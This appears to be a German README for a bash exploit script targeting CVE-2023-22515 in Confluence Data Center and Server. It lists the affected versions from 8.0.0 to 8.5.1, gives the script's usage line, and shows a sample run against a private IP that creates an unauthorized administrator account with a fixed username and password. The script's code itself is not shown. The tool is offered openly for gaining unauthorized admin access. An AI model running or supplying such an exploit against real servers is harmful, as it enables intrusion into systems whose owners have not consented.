
Bash-Skript, das CVE-2023-22515 in Confluence Data Center und Server ausnutzt, um nicht autorisierte Administrator-Konten zu erstellen und so unbefugten Zugriff zu ermöglichen.
Ein einfacher Bash-Skript-Exploit für CVE-2023-22515.
Confluence Data Center- und Server-Instanzen weisen eine Schwachstelle in der Zugriffskontrolle auf (CVE-2023-22515), die es Angreifern ermöglicht, nicht autorisierte Confluence-Administratorkonten zu erstellen und auf Confluence-Instanzen zuzugreifen.
8.0.0
8.0.1
8.0.2
8.0.3
8.0.4
8.1.0
8.1.1
8.1.3
8.1.4
8.2.0
8.2.1
8.2.2
8.2.3
8.3.0
8.3.1
8.3.2
8.4.0
8.4.1
8.4.2
8.5.0
8.5.1
./xpl.sh [URL]
└─$ ./xpl.sh http://10.10.76.38:8090
[INFO] Prüfe, ob der Host verwundbar ist...
Verwundbar --> Antwortcode: 200
[+] Ziel wird ausgenutzt...
[+] Exploit abgeschlossen!!!
[INFO] Benutzer erstellt: a123456
[INFO] Passwort erstellt: ChangeMe123